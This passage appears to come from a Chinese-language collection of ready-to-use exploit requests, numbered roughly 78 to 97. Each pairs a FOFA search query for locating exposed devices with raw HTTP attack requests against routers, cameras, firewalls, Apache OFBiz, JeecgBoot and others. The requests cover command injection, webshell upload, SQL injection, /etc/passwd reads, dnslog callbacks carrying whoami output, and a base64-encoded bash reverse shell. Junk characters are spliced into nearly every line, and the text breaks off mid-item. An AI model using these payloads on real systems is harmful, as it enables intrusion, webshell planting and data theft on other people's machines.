1 q4 H+ y0 j2 m- p& y$ u: ^* @, n) Q: s6 @9 }8 _
------YsOxWxSvj1KyZow1PTsh98fdu6l
& x$ G0 l' O6 `Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
, t0 ]0 j+ z8 [' p' `0 K, o, HContent-Type: image/png, B1 @8 R6 w, z/ k

. X9 y' }0 A) z$ \7 q; `4 ]YsOxWxSvj1KyZow1PTsh98fdu6l% k2 u2 F5 N. Z: O
------YsOxWxSvj1KyZow1PTsh98fdu6l) r5 R& j& g0 ]9 Z! x0 P
Content-Disposition: form-data; name="target"
% x* g% @1 U7 G7 X" n( O4 y4 ]9 b* ^$ s- N
/Applications/SkillDevelopAndEHS/, u( z$ `0 m. k- C% ]7 Q
------YsOxWxSvj1KyZow1PTsh98fdu6l--
# b! h0 a. k$ X: U5 L% B
7 h( S' S) n, Z: j! o) C. H. _9 {2 O
9 p! H0 H. `7 u% T) ^+ {" f: y6 fGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
* `, c7 k' Y) {+ a& z& a" }& ZHost: x.x.x.x3 d* Y8 [$ \3 r  e8 a

& v" f" T$ \& T. n* q* ^/ a( r9 j6 s  _7 [* N6 M6 J2 u
79. BYTEVALUE 百为流控路由器远程命令执行1 S9 p, }, Y7 ]$ Z$ @: o
FOFA:BYTEVALUE 智能流控路由器) s/ T1 V* D) M3 j
GET /goform/webRead/open/?path=|id HTTP/1.1
2 j2 a$ _; e  ~1 OHost:IP
+ h/ I# R" t% @' G, fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.08 H2 p8 l5 q; |* k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ X) S- `5 D. c9 Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 M. ?) O2 z# M, e- \- W2 K# z$ D  K
Accept-Encoding: gzip, deflate' {7 }5 M9 @* M& y) ?
Connection: close
. @! a1 E2 S) Z5 ~# X  NUpgrade-Insecure-Requests: 19 }$ p( e; ?: g3 f: d
% \1 ?4 G: t6 N5 G' A$ E

, w( R* |) ]& W. H3 T80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
' ^3 i/ y7 W: {. h$ P5 E( T1 K5 SFOFA:app="速达软件-公司产品"" a) b5 q* R. h' [! t
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1' r/ }1 s" |* T9 M0 a
Host: x.x.x.x
+ p( X8 k+ ~4 z( A  A5 U5 X4 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 o* O0 U" C2 tContent-Length: 278 e1 G. S0 m5 b2 @% p+ F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 _' w, G4 Z8 d! }1 r# q! HAccept-Encoding: gzip, deflate
* k/ s$ m9 R' w/ O3 ]. z0 }6 v. NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 S. [+ @& N4 m, b, tConnection: close, O4 {+ z, Q7 {; N7 g# }9 u
Content-Type: application/octet-stream
3 _# U; ?, \: g7 ?Upgrade-Insecure-Requests: 1
$ ?/ I; I9 ?! `  W+ d3 f) @
5 l6 ?; l1 D, P( p. R. e<% out.print("oessqeonylzaf");%>$ L6 L4 b0 E$ a7 r" o: d6 V

; s! M8 |$ s, g, O0 ~5 R$ s
0 l- r5 O7 A9 X$ h9 f2 J/ g9 ]GET /xykqmfxpoas.jsp HTTP/1.1
: ?9 {! X9 D; u+ p4 QHost: x.x.x.x
) z/ ?/ `% K$ e! F6 E/ VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' A  x1 `) I  a/ ^$ O5 ^4 rConnection: close
$ |. \* T6 @7 o& J, m9 B  mAccept-Encoding: gzip
+ e6 S4 v2 o, P) `% o7 Z+ n
1 d" \. d: r" s, C$ K
* j  X5 V4 P' T  K  Q+ h81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露. G9 Q, _( o7 P' v8 i) ]
FOFA:app="uniview-视频监控", ~6 G/ D8 ]( e; Q
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
& Z/ p1 s5 o3 Z) P: a- qHost: x.x.x.x
, G0 T3 q8 ?9 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ D. ^  h6 M  g7 |
Connection: close! v" g4 P$ |5 T& Q$ O: ^
Accept-Encoding: gzip0 O( F0 Z  W( s$ k

+ v& G0 V+ V$ [. Y. U
1 G; Z. p) \4 e- ]% ^82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行" @& G) I2 D" ?$ Z% U; x. W1 v" K
FOFA:app="思福迪-LOGBASE"
$ A) C( W2 N0 U1 J9 Z3 e3 b7 A9 F$ X$ kPOST /bhost/test_qrcode_b HTTP/1.1# C8 I" p! ]3 d1 L( _& C- q
Host: BaseURL
: o- [; k5 y% n+ s$ a; {. d. sUser-Agent: Go-http-client/1.1* r7 ^, s# l+ j- ]/ u& z
Content-Length: 23
% W  g- C$ [# p: y- A4 MAccept-Encoding: gzip4 o3 h' \  t4 ?% k
Connection: close/ r% ^9 g1 h! N& i/ I* t
Content-Type: application/x-www-form-urlencoded
% B% Z! u; `0 H! K3 i5 I- V+ [1 qReferer: BaseURL
. z$ K9 N- @* t5 m& @2 c& L# t7 q- M) D* ]) P
z1=1&z2="|id;"&z3=bhost8 ~+ D  y+ c" A! E0 W0 ~

- W% @% q" i- H, A: I4 l, L: z, y7 T
83. JeecgBoot testConnection 远程命令执行& i) m6 R5 _9 e; R9 x! u9 a
FOFA:title=="JeecgBoot 企业级低代码平台"' m% k1 |& B3 U" k. ?; ~( \
* R6 z; e  l* G1 \; X/ E2 u

" e/ H+ g+ E# d: a" {" {& yPOST /jmreport/testConnection HTTP/1.13 m9 W$ r: G% A# S0 d! {# a
Host: x.x.x.x
* s0 @6 o1 z. C2 VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
, p+ x0 O* G7 y) p9 y- dConnection: close
  `0 `+ h8 I1 R3 WContent-Length: 8881' B6 Q' a( t! }6 W
Accept-Encoding: gzip
8 {; n4 Z; [& W/ CCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"* b6 C* b6 ~4 m8 A( x
Content-Type: application/json4 I( a  `9 R; @  R/ S) ^
* q3 K1 t! l& ~7 ^8 L
PAYLOAD
$ k0 ?4 M% B6 B/ i
' H. r  R/ T2 A9 g7 V" b. [0 V84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
7 r0 e8 W+ Z1 j6 W( QFOFA:title=="JeecgBoot 企业级低代码平台"7 [6 s! k( E' e6 C9 n

7 T) X" @+ I2 R$ i3 W1 z: V5 C* }2 B# D$ m

2 i' E, h8 D' J0 i4 p% y$ kPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.15 P; \' j% `) S: K  w
Host: 192.168.40.130:8080
! z+ V4 V% @9 Y- r) l& j; A  qUser-Agent: curl/7.88.16 _) d' s" l4 j! A, o; [  s
Content-Length: 156  Y8 v- W5 e& m8 R
Accept: */*
) `( k8 K6 h, T# JConnection: close. K  M: _; x8 ^  h* `
Content-Type: application/json' O: M9 k. O. b9 S4 q+ {8 c
Accept-Encoding: gzip- i  |4 u. W6 U: [5 J! n

3 v9 ^1 r! A4 a- A( R8 e{( V1 U' ~" h2 _- m$ T1 G# c4 z
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",1 X5 B( O9 R: P5 F% y7 _9 }0 l' x" {
  "type": "0"2 |4 M0 H3 u  O  D$ y7 u
}
3 z: ^, H5 x0 V" K! h; |# o2 a8 `. P# E& c6 c2 F1 R- Q' p

( [' t" J1 _1 z. A; E85. SysAid On-premise< 23.3.36远程代码执行; b9 P7 W( J; k3 I( U
CVE-2023-472467 l- E1 k7 m8 G6 a2 ~# `/ R1 |
FOFA:body="sysaid-logo-dark-green.png" 3 @# p  V7 x: y2 [
EXP数据包如下,注入哥斯拉马
$ H7 h$ `. J0 d% m. t/ B& R* Z. U- tPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1* P2 [5 W! ~9 Q( A2 w6 K
Host: x.x.x.x9 \# P( ]; a* g' p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! k5 j  k2 A4 g" E# ?
Content-Type: application/octet-stream5 f- U/ q. u1 m* v" z
Accept-Encoding: gzip
+ w% U& U8 t; `% ^# e1 K% m. O% U% [" D; [+ r3 ?' d+ s+ l+ U
PAYLOAD7 S9 ~1 Y7 w8 Z7 [/ f6 @8 |
; w/ [! _- q; k% S& R& x; ?) Q
回显URL:http://x.x.x.x/userfiles/index.jsp
. |" Z+ z. Z% P7 @# Q& y" U. o; z/ p8 }) [& E
86. 日本tosei自助洗衣机RCE
, a4 f" _* R& D0 K- x+ h! SFOFA:body="tosei_login_check.php"
* x( N, ^- ]: V# O8 w! sPOST /cgi-bin/network_test.php HTTP/1.1' y% _- A' J: ~1 v+ o9 k4 Z0 K3 \* D5 Q
Host: x.x.x.x
. i+ V$ s; i4 q; m. _$ P0 ZUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.362 Q7 T8 [% o4 x* C
Connection: close' o8 D# p1 v* n8 T' Q2 L
Content-Length: 44, ?+ _" X8 ~  _
Accept: */*
# I  |6 f7 q- f, n6 Y! p7 x' q; D1 U5 m/ M# gAccept-Encoding: gzip. @* [( o* c; |8 F
Accept-Language: en/ o, O6 b" U# i: C( j, L
Content-Type: application/x-www-form-urlencoded1 D4 C3 E0 D1 U( C2 F  T  e2 P! c

9 k# e. k0 {7 `4 dhost=%0acat${IFS}/etc/passwd%0a&command=ping+ ~0 ~: ^1 F: E; B* k

! d8 n9 j+ N& v1 |/ n1 s; w7 b
; }3 z. Y  \% {4 G" v87. 安恒明御安全网关aaa_local_web_preview文件上传
' G! ^  }# `# o+ s4 Y. bFOFA:title="明御安全网关"2 d9 J: ~. ?- v* ~* S
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
5 o# a4 y  }7 Y# A3 [: n( NHost: X.X.X.X
8 m/ g4 T4 d# |  l4 c" N( g( GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, |1 S$ X, z6 v% f) _
Connection: close4 G4 t4 o% L6 D" L
Content-Length: 198
) f* U2 P' H) l3 r. Y$ U6 ]Accept-Encoding: gzip( g7 ~' j3 k" i+ `2 ^; \: z' K
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
- r0 p+ @- N9 A
( n# y, c. E8 d  B" m/ V--qqobiandqgawlxodfiisporjwravxtvd
/ i+ i0 ^" K0 l% U. A$ t: cContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"1 m. \, X4 G- R( s& N
Content-Type: text/plain
6 q: Q' D$ X1 Y3 C+ H* p" G. n# J# v7 E8 @( ]7 o
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
! u  X) X- _# U& P# Z$ U9 s. ^5 d8 R' h--qqobiandqgawlxodfiisporjwravxtvd--! H& _+ D7 _! J7 M
# y! s& y" i( s+ H8 q0 \

! h& z) A, t* C2 Q& R0 T$ x" h/jfhatuwe.php& Y) J- r: `5 ?* ?. H. V
5 T6 j' W& ], y( E4 z- q. Z( i  P, B
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
1 I) A4 j2 \+ y$ I- l% {5 yFOFA:title="明御安全网关"
+ F7 \5 o+ K# ]GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
' s9 k) L; C( AHost: x.x.x.xx.x.x.x
! v/ Z1 C. G! P$ ^% B1 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
9 t) F- ?0 V' p! _! B( PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 L4 i# G9 V$ w. v1 v# ?; M; H
Accept-Encoding: gzip, deflate
$ b9 h8 e: k3 KAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% r7 ~% k' M! g( v" B0 c" DConnection: close7 d3 v, |: H8 Y6 n8 ?
5 X4 b- J3 R; S& r' W4 O$ G% _
$ t( P% F' }  P1 {3 c( j7 o
/astdfkhl.php2 _+ L4 _6 V& p, h/ r3 i
7 I  b8 j* y7 U$ A! P. b
89. 致远互联FE协作办公平台editflow_manager存在sql注入
  Z; R9 x3 F1 ]' U+ rFOFA:title="FE协作办公平台" || body="li_plugins_download"
8 O4 Y9 X% I2 [5 q" K; Q1 z. ?POST /sysform/003/editflow_manager.js%70 HTTP/1.1
+ [, s0 _0 `! j! h9 qHost: x.x.x.x' n. g, k& @; y2 u3 q! V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& _( A: [- Y& S( rConnection: close5 E1 h$ z9 j# c
Content-Length: 41  u3 ?& X  R  e5 E" j
Content-Type: application/x-www-form-urlencoded, c' Z6 M- ]- T6 R2 M# \
Accept-Encoding: gzip' G$ ?9 `' d7 z4 p& T: A4 i2 z/ s

% Z# F6 e6 s- Zoption=2&GUID=-1'+union+select+111*222--+( n7 ?8 s7 I4 t* R
0 X/ g+ x4 n, z2 a. Z& E1 U! ?, e

$ Z5 K% j9 {7 P. ]0 M9 I90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
5 z* _+ W$ `2 \: W7 b" eFOFA:icon_hash="-1830859634"
8 L; r- p( B& {" O- N" Y3 cPOST /php/ping.php HTTP/1.1
% W0 s; a+ M  j( x* |Host: x.x.x.x, @8 o  O$ V2 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0- u, k) }; U7 ~; u6 O
Content-Length: 514 w, V7 v" ^" j2 d7 m( C0 \
Accept: application/json, text/javascript, */*; q=0.01
" i0 H  I$ R# @; L/ ^Accept-Encoding: gzip, deflate
. s1 \; _) `! x8 ^& }& }/ GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 n! o$ e: j6 [& I- M' rConnection: close3 k( T' I" s3 E' j. V
Content-Type: application/x-www-form-urlencoded9 _. x' t. a: b
X-Requested-With: XMLHttpRequest
3 l, f& W" a9 p8 S. ~( l3 Y
- D8 X. k* s% C# q5 L, u  m9 M2 Xjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
" O4 n$ ^3 Y# \) r5 I1 {% }) X8 G- ?$ G0 l3 j+ B# S

5 @/ x9 x! [1 X4 |7 b* Y91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
; d' a: s$ L3 K9 pFOFA:title="综合安防管理平台"
( {' |2 [. y* lGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1' _: s: z1 R7 z' d  n0 Y! {: {
Host: your-ip
1 n* Y" i, Z/ U0 ~5 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
5 K" ?. z: U5 D5 [Accept-Encoding: gzip, deflate
! M+ a! F! v* z. Y4 ^Accept: */*
% W7 @( E* Q- E+ C* g6 U3 h9 P+ xConnection: keep-alive4 ^+ s9 G  a4 L0 O( j9 E, l
+ g) b8 m- [; |) K

" j; J1 y$ J9 @5 B
5 o% \2 H$ G. V92. 海康威视运行管理中心session命令执行: [7 t8 |- X3 f! v+ v2 _2 V
Fastjson命令执行
/ ~  h; s: z8 Qhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
1 l' Q/ a6 h7 Y+ [POST /center/api/session HTTP/1.1. M+ m1 ^. [' `! F, @- A
Host:
; o/ ^1 H1 e7 q/ TAccept: application/json, text/plain, */*
# t6 B4 V* U6 [, LAccept-Encoding: gzip, deflate/ P8 _% q* J) c
X-Requested-With: XMLHttpRequest# L" p( Q( `- r3 u) C
Content-Type: application/json;charset=UTF-8% R  D. ^9 ?  D) s( N9 h6 f) y6 V
X-Language-Type: zh_CN6 Z9 m, ~: J/ e8 l6 W# i! B% w
Testcmd: echo test
6 f, }9 e6 B" j+ g: M6 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36% {+ [/ e) ~2 V6 n2 |. F2 ~3 l
Accept-Language: zh-CN,zh;q=0.9
7 [( C  g5 _8 MContent-Length: 57781 D$ |) T$ f9 h. K/ b
0 R1 {0 C) ?) P2 E
PAYLOAD/ u2 t$ L5 p$ {( w% p' T
! U; `* {8 M0 n6 r+ o; N" S

% H" r+ S6 P7 g3 @& F93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传/ g" R) t. ]" @4 S* L. `+ u
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="4 ]" J1 B' _/ n) i9 h
POST /?g=app_av_import_save HTTP/1.1
1 P/ n" V0 Z" Q- V5 r5 kHost: x.x.x.x' |& k) E! p  V! u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
* C5 A1 |2 A: d9 c4 h, H! J# LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 f  f+ W3 R  U. N1 D  w7 m/ S! E5 W( b) `$ c- z
------WebKitFormBoundarykcbkgdfx
- M2 B: U; U. ]1 M% @Content-Disposition: form-data; name="MAX_FILE_SIZE"7 J1 k# H( a% W! \( c8 S

) V8 X  Q0 ?6 p6 E. F100000007 x, O" E$ \" {  Y2 l0 ^3 l
------WebKitFormBoundarykcbkgdfx
* k) P# I& O% `, j6 L% P' mContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"' i, o& M  ^2 u
Content-Type: text/plain, j0 N5 Q7 s) g5 I5 D# M) J5 p* {* ~

. j8 \! P5 u; L( n0 [wagletqrkwrddkthtulxsqrphulnknxa
+ g* H  o0 K6 g------WebKitFormBoundarykcbkgdfx: Z9 k: o3 [9 P7 Q  _# D3 O
Content-Disposition: form-data; name="submit_post"
! j  _# H/ P& Y( O9 K+ u- C& D* W" L
' u3 {3 D6 Q# r- @' N% T% robj_app_upfile
* \3 {) @+ P* T9 e' D& X------WebKitFormBoundarykcbkgdfx
7 l1 [6 C1 _. a5 E( {/ qContent-Disposition: form-data; name="__hash__"
3 S0 m6 B2 q$ m. m3 R5 ?* I8 W! s
0b9d6b1ab7479ab69d9f71b05e0e9445
& c1 t* [. e( H  ^+ d2 e------WebKitFormBoundarykcbkgdfx--
# V# V/ e  {0 z: `& z
, M% ?  Z2 k$ h  g# R, u4 `4 ]3 ]1 v# u  g; f* b: ~; P+ C# O
GET /attachements/xlskxknxa.txt HTTP/1.1- V3 W" H" D, G( @5 ?( G+ y" ~
Host: xx.xx.xx.xx6 e0 B0 ^* Y7 f, \$ O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% P7 L( R% E+ Y+ n" x
" i: T0 F+ t5 `/ q7 G
0 z1 C( j) ~8 v" h2 R8 B% ?
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传; s- r* T  w$ D/ O3 p% j
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="6 Q3 ]; O$ t6 U# a! q( I
POST /?g=obj_area_import_save HTTP/1.1. B8 o$ ~$ U+ l& E( l6 `( J1 s4 _
Host: x.x.x.x. K2 x7 L6 \7 B5 }5 R+ }4 K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt* r' U+ A4 G6 i- A9 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.363 ^" E+ l* C* T5 y) G) F9 A" [
& S% X( _( a% J9 J0 i, |; z+ p
------WebKitFormBoundarybqvzqvmt
. E/ g. W& i. ^: d2 |9 eContent-Disposition: form-data; name="MAX_FILE_SIZE"
2 l2 W$ m* g2 x3 h2 [- V8 g1 _  J# n4 v! f' p
100000007 ?3 S* z6 L8 Y+ v- {
------WebKitFormBoundarybqvzqvmt
1 y, w* J& ?% kContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt": \7 G& o6 b7 x$ T. ?% D9 q+ m* Y
Content-Type: text/plain. S/ M' O9 R: J' ~) h, }

0 H4 h# H' _* r: h4 k! M, [pxplitttsrjnyoafavcajwkvhxindhmu
  G$ r9 r2 x6 m5 [5 J. P------WebKitFormBoundarybqvzqvmt; U: e, {5 q* n. R
Content-Disposition: form-data; name="submit_post"
+ }% @$ D  `7 ~- _! Y0 k) s3 l% K6 b) O8 ?8 D5 ?% l
obj_app_upfile8 Q5 \% q$ E" }3 p. y2 U) W
------WebKitFormBoundarybqvzqvmt+ f4 {5 o. y1 j, b
Content-Disposition: form-data; name="__hash__"
5 p4 T3 I& C* N1 @
8 Q( @% T" w! D. [1 M0b9d6b1ab7479ab69d9f71b05e0e9445
& ]! d% z5 r. ]. l------WebKitFormBoundarybqvzqvmt--
3 \. ?% z: i7 D; r' @7 B1 b* S0 }5 \1 Q+ v$ F0 r2 h

6 D; _  o4 C9 ^
3 `+ X/ J3 H% R% D$ TGET /attachements/xlskxknxa.txt HTTP/1.1
7 }, S1 z4 Y1 q+ Y) ]* }Host: xx.xx.xx.xx( P0 k' q( D; ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# R6 j$ Z  z. \( V# J) P
$ W5 h" I- K9 R5 q( k% |
2 ]( H% X4 d9 y8 e4 V4 u, w% g  E. R& k0 Z* K5 j  o' s
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
3 f. m9 }$ t' y2 b- l" v' Z8 }% v% c" cCVE-2023-49070% i9 I+ O- ?. p8 \
FOFA:app="Apache_OFBiz"% [/ L/ N7 z6 |' f9 t9 t
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.10 k  K/ D: G# K; g3 q$ `4 J, ~; H
Host: x.x.x.x5 @0 f6 p! a2 w9 j" z4 N
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.369 _  H3 ?3 @+ C
Connection: close- t! r6 v# J; T& G8 e1 W
Content-Length: 889
5 P! }- @  [, Z% @Content-Type: application/xml
; Y9 k8 E  H5 D$ sAccept-Encoding: gzip
1 q! p5 M& o6 T: D+ d
& R  [4 n: r% F. U" z<?xml version="1.0"?>$ B, E( U& s3 N( t7 {
<methodCall>
$ @( E2 }, C, b; R% Y, j+ B0 |   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
9 A  n- L7 ]( ]& U6 D    <params>& t, O7 l$ B) k  p4 f9 u7 c
      <param>- Y& D4 X. J# C9 M, Y
      <value>
! G: ^. F0 R- ~7 X, p        <struct>8 w2 b% F' K& G/ N
       <member>7 D8 {! ]* j' C$ q1 ]2 r' L# S
          <name>test</name>
( j1 @% Y5 z3 V  s          <value>
6 y5 I% ^$ I9 T; @' ^      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>9 X, i9 u3 w6 y7 o& @
          </value>0 J" n  j  p, f6 c) [$ L
        </member>4 ^* }# A! ]+ \' j: F' C1 v
      </struct>4 r9 X! s3 D, T8 L
      </value>
( L3 }, e2 \' i$ r0 b2 H    </param>8 _- w: o* D& n) y
    </params>
0 Q8 {5 W' V% U5 P% s+ ~</methodCall>) m+ u+ n8 P1 B" x* ]
& e4 j: Q/ X# s' W" ?4 ]  c- r$ J

. h& \' K4 d# j* w用ysoserial生成payload
1 \- d" t! B4 M7 D* [' f7 g* vjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"' X) y% {% x. j8 N' @
  k3 V. F" J7 M! o4 h
' s" L% Z! P9 \6 h; K
将生成的payload替换到上面的POC% t& m3 r$ w$ I8 }2 r. i8 n; k0 }
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
# x) e" y5 L% I' q, x+ r' D% THost: 192.168.40.130:8443
8 }" O4 N3 Z0 MUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36% Y( h4 S3 ?  i$ H
Connection: close) Z' h% E$ U- C; C2 w) _' F* q; K
Content-Length: 889! K( v2 {2 `. @2 P: x6 Y" M
Content-Type: application/xml( H% E' f# Q, y) F! o- K4 P) i
Accept-Encoding: gzip. a- q  X6 P6 d( |  h7 B2 k

; P: M) e! z( a  `. O5 bPAYLOAD3 m5 u4 |6 x: f- O6 @8 N( Q! A
% u$ O' h% v1 o, N. J4 @" V: A
96. Apache OFBiz  18.12.11 groovy 远程代码执行) T( a) x  w# p8 c1 U& x
FOFA:app="Apache_OFBiz"! m$ D/ X$ m) P
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
$ ~) i3 \, x- l& g. pHost: localhost:84432 |' h5 [& h# A  r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 y  s1 ~: q7 |8 t1 e( \Accept: */*& ~( g4 E$ ]: y" R# z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) u/ F) _  x5 e9 v/ B. B4 i% Q6 XContent-Type: application/x-www-form-urlencoded
  A5 z% `$ [: `( w; LContent-Length: 55( X9 x* w0 P7 H% B9 U' `9 L/ o

3 R+ f1 V1 s: x" E4 \2 G9 z; m4 @0 qgroovyProgram=throw+new+Exception('id'.execute().text);
- i8 \& v1 X0 j  A: H
1 e3 _* B9 P( N) j& a: \$ i$ c- T0 N/ G0 i
反弹shell6 ~' c3 ^& ^) D, u2 `  ?6 J. z
在kali上启动一个监听( h" W& A# n" ^5 F
nc -lvp 7777
7 b! y/ [4 Q; ]& ~( A, v0 t
2 T( z1 i  Z( q3 `POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, X9 h" w2 [6 J2 A! THost: 192.168.40.130:84436 B+ q5 s3 f  n* J0 C2 ^9 ^. q  ]6 b6 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
. J  x# g1 t. v' C2 [8 F3 M9 bAccept: */*
# R3 w- {1 P" I# q$ aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 P1 ^2 A8 P5 X% d. nContent-Type: application/x-www-form-urlencoded2 H9 J6 }9 M- ^+ y" ]: m
Content-Length: 719 f; g# B0 E, X

! h# Y# B- s! x' EgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
$ J3 o3 d6 K: g) M( a2 X- u7 z" M. {; y* ~% s4 x6 X
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
" P! o# P9 H, b* P- C) t! QFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
" n7 [1 M# i6 x" z+ [  S" ?1 d+ NGET /passport/login/ HTTP/1.1% q5 [  P8 u3 B7 d/ ]
Host: 192.168.40.130:80854 l8 Y; V7 o% R, e! l3 o) ~- F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; w# P2 r. q/ j& {5 f6 k/ |
